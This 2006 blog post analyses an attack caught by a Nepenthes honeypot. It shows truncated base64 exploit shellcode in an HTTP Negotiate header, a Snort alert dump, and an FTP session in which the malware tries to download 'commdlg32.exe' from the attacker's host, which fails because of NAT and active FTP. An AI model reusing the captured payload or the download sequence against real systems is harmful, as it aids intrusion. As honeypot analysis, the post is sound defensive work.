Tuesday, January 24, 2006

Nepenthes Discoveries

Earlier today I posted how I installed Nepenthes. Within a few minutes I started getting hits. Monitoring with Sguil makes analysis much easier.

Consider this first attack:

Sensor Name: soekris
Timestamp: 2006-01-24 18:14:34
Connection ID: .soekris_4888215984542487947
Src IP: 69.11.44.99 (69-11-44-99.regn.hsdb.sasknet.sk.ca)
Dst IP: 69.243.40.166 (pcp0010708738pcs.manass01.va.comcast.net)
Src Port: 1734
Dst Port: 80
OS Fingerprint: 69.11.44.99:1734 - Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) [priority1]
OS Fingerprint: -> 69.243.40.166:80 (distance 24, link: ethernet/modem)

SRC: GET / HTTP/1.0
SRC: Host: 69.243.40.166
SRC: Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
...edited...
SRC: FBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6
...edited...
AwgA+A8BAPgPASOCCDkDggQRAENDQ0Mg8P1/U1ZXZoHsgACJ5ujtAA
DST: Microsoft Windows 2000 [Version 5.00.2195]
DST: (C) Copyright 1985-2000 Microsoft Corp.
DST:
DST: C:\WINDOWS\System32>
SRC: AA/zZoCRLWY+j3AAAAiUYI6KIAAAD/dgRoa9AryujiAAAAiUYM6D8AAAD/dgRo+pcCTOjNAAAAMdt
...edited...
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE==
SRC:
SRC: .

In the middle of that mess you can see Nepenthes pretending to return a Windows command shell.

Here is the text represenation of the corresponding Snort alert as reported through Sguil.

------------------------------------------------------------------------
Count:1 Event#1.2039 2006-01-24 18:14:34
http_inspect: OVERSIZE REQUEST-URI DIRECTORY
69.11.44.99 -> 69.243.40.166
IPVer=4 hlen=5 tos=32 dlen=1500 ID=60064 flags=2 offset=0 ttl=104 chksum=16980
Protocol: 6 sport=1734 -> dport=80

Seq=2259253829 Ack=960260189 Off=5 Res=0 Flags=***A**** Win=17520 urp=61185 chks
um=0
Payload:
46 42 51 55 46 42 51 55 46 42 51 51 4D 41 49 34 FBQUFBQUFBQQMAI4
49 4D 56 77 4F 43 42 41 6F 41 6B 45 4B 51 51 70 IMVwOCBAoAkEKQQp
...edited...
31 2F 55 31 5A 58 5A 6F 48 73 67 41 43 4A 35 75 1/U1ZXZoHsgACJ5u
6A 74 41 41 jtAA

This is interesting, but what happens next is cooler.

Here are the three sessions involving the attacking source IP, as recorded by SANCP and reported by Sguil.

------------------------------------------------------------------------
Sensor:soekris Session ID:4888215984542349888
Start Time:2006-01-24 18:14:34 End Time:2006-01-24 18:14:34
69.11.44.99:1732 -> 69.243.40.166:80
Source Packets:4 Bytes:0
Dest Packets:3 Bytes:0
------------------------------------------------------------------------
Sensor:soekris Session ID:4888215984542487947
Start Time:2006-01-24 18:14:34 End Time:2006-01-24 18:14:35
69.11.44.99:1734 -> 69.243.40.166:80
Source Packets:9 Bytes:5699
Dest Packets:5 Bytes:104
------------------------------------------------------------------------
Sensor:soekris Session ID:4888215988836780153
Start Time:2006-01-24 18:14:35 End Time:2006-01-24 18:15:27
69.243.40.166:50748 -> 69.11.44.99:11624
Source Packets:11 Bytes:71
Dest Packets:10 Bytes:191

The first session is recon. The second is the attack as seen by Snort.

Here is a transcript of the last session.

Sensor Name: soekris
Timestamp: 2006-01-24 18:14:35
Connection ID: .soekris_4888215988836780153
Src IP: 69.243.40.166 (pcp0010708738pcs.manass01.va.comcast.net)
Dst IP: 69.11.44.99 (69-11-44-99.regn.hsdb.sasknet.sk.ca)
Src Port: 50748
Dst Port: 11624
OS Fingerprint: 69.243.40.166:50748 - UNKNOWN [65535:63:1:64:M1460,N,W1,N,N,T,S,E:P:?:?] (up: 1264 hrs)
OS Fingerprint: -> 69.11.44.99:11624 (link: ethernet/modem)

DST: 220 StnyFtpd 0wns j0
DST:
SRC: USER lol
SRC:
DST: 331 Password required
DST:
SRC: PASS lol
SRC:
DST: 230 User logged in.
DST:
SRC: PORT 192,168,2,7,211,48
SRC:
DST: 200 PORT command successful.
DST:
SRC: RETR commdlg32.exe
SRC:
DST: 150 Opening BINARY mode data connection
DST:
DST: 425 Can't open data connection.
DST:
SRC: QUIT
SRC:
DST: 221 Goodbye happy r00ting.
DST:

"lol" indeed. Nepenthes was unable to retrieve the commdlg32.exe binary because of this PORT command:

SRC: PORT 192,168,2,7,211,48

The attacker FTP server does not know how to connect to 192.168.2.7!

I am sniffing this activity outside of my router, which should have translated 192.168.2.7 into the router's public IP. Why didn't that happen? The reason is the destination port for this FTP command channel -- it's 11624 TCP. The standard FTP command channel uses dest port 21 TCP.

In this case, the malware was unable to retrieve additional executables because it chose to use active FTP. If it had chosen passive FTP, then the client would have connected to the server. No client PORT command would have been required.

3 comments:

nepenthesdev said...

windows ftp client does not support passive ftp, so the only way to get it done is active ftp, and active ftp suffers hard when your natted and the controll connection port is not known to iptables ftp module or whatever.

check
http://nepenthes.sourceforge.net/documentation:modules:downloadhandler:download_ftp
for more rant about windows ftp client

Anonymous said...

It's been fixed, now there is a conf file for download-ftp that allows you to set the public ip for the PORT command to return.

Anonymous said...

Well.. since i have started trying Neoenthes I NEVER EVER EVER COLLECTED An effing sample!!

Of course i am behind a router! Who is not?...

Is there anyone that can give clear explanation on how to set the darn thing up?